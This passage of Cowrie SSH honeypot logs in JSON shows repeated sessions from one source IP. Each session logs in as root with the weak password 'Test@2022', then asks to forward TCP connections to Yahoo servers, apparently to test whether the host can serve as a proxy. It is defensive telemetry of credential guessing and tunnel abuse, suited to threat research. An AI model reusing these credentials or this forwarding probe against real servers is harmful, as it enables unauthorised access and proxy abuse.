penssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.070985Z","src_ip":"213.209.150.239","session":"1897fe912c5c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.353111Z","src_ip":"213.209.150.239","session":"1897fe912c5c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":45,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:45","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.410694Z","session":"1897fe912c5c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.468318Z","src_ip":"213.209.150.239","session":"1897fe912c5c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":8096,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8096","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.623156Z","session":"1897fe912c5c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.679854Z","src_ip":"213.209.150.239","session":"1897fe912c5c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.737220Z","src_ip":"213.209.150.239","session":"1897fe912c5c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52438,"dst_ip":"1.2.3.4","dst_port":22,"session":"49b3cbdaed85","protocol":"ssh","message":"New connection: 213.209.150.239:52438 (1.2.3.4:22) [session: 49b3cbdaed85]","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.783616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.784582Z","src_ip":"213.209.150.239","session":"49b3cbdaed85"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:29.831700Z","src_ip":"213.209.150.239","session":"49b3cbdaed85"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.067598Z","src_ip":"213.209.150.239","session":"49b3cbdaed85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":28663,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28663","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.115783Z","session":"49b3cbdaed85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.162951Z","src_ip":"213.209.150.239","session":"49b3cbdaed85"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":5949,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:5949","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.297618Z","session":"49b3cbdaed85"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.345080Z","src_ip":"213.209.150.239","session":"49b3cbdaed85"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.393415Z","src_ip":"213.209.150.239","session":"49b3cbdaed85"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52478,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c59742cefe0","protocol":"ssh","message":"New connection: 213.209.150.239:52478 (1.2.3.4:22) [session: 0c59742cefe0]","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.439553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.440257Z","src_ip":"213.209.150.239","session":"0c59742cefe0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.487770Z","src_ip":"213.209.150.239","session":"0c59742cefe0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.722157Z","src_ip":"213.209.150.239","session":"0c59742cefe0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":1793,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:1793","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.770504Z","session":"0c59742cefe0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.817850Z","src_ip":"213.209.150.239","session":"0c59742cefe0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":21022,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21022","sensor":"my-vps","timestamp":"2025-08-26T00:55:30.953651Z","session":"0c59742cefe0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.000830Z","src_ip":"213.209.150.239","session":"0c59742cefe0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.048801Z","src_ip":"213.209.150.239","session":"0c59742cefe0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52510,"dst_ip":"1.2.3.4","dst_port":22,"session":"9505282181f7","protocol":"ssh","message":"New connection: 213.209.150.239:52510 (1.2.3.4:22) [session: 9505282181f7]","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.094974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.095940Z","src_ip":"213.209.150.239","session":"9505282181f7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.142952Z","src_ip":"213.209.150.239","session":"9505282181f7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.377504Z","src_ip":"213.209.150.239","session":"9505282181f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32201,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32201","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.426036Z","session":"9505282181f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.473368Z","src_ip":"213.209.150.239","session":"9505282181f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":4058,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4058","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.609684Z","session":"9505282181f7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.658180Z","src_ip":"213.209.150.239","session":"9505282181f7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.706261Z","src_ip":"213.209.150.239","session":"9505282181f7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52553,"dst_ip":"1.2.3.4","dst_port":22,"session":"77ee6a8e28ee","protocol":"ssh","message":"New connection: 213.209.150.239:52553 (1.2.3.4:22) [session: 77ee6a8e28ee]","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.761709Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.762589Z","src_ip":"213.209.150.239","session":"77ee6a8e28ee"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:31.819286Z","src_ip":"213.209.150.239","session":"77ee6a8e28ee"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.101108Z","src_ip":"213.209.150.239","session":"77ee6a8e28ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":27834,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:27834","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.158762Z","session":"77ee6a8e28ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.216155Z","src_ip":"213.209.150.239","session":"77ee6a8e28ee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":26966,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26966","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.370885Z","session":"77ee6a8e28ee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.427962Z","src_ip":"213.209.150.239","session":"77ee6a8e28ee"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.485588Z","src_ip":"213.209.150.239","session":"77ee6a8e28ee"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52600,"dst_ip":"1.2.3.4","dst_port":22,"session":"e19bfeef823f","protocol":"ssh","message":"New connection: 213.209.150.239:52600 (1.2.3.4:22) [session: e19bfeef823f]","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.541089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.541745Z","src_ip":"213.209.150.239","session":"e19bfeef823f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.598270Z","src_ip":"213.209.150.239","session":"e19bfeef823f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.880415Z","src_ip":"213.209.150.239","session":"e19bfeef823f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23041,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23041","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.937736Z","session":"e19bfeef823f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:32.994367Z","src_ip":"213.209.150.239","session":"e19bfeef823f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":27960,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27960","sensor":"my-vps","timestamp":"2025-08-26T00:55:33.151058Z","session":"e19bfeef823f"}
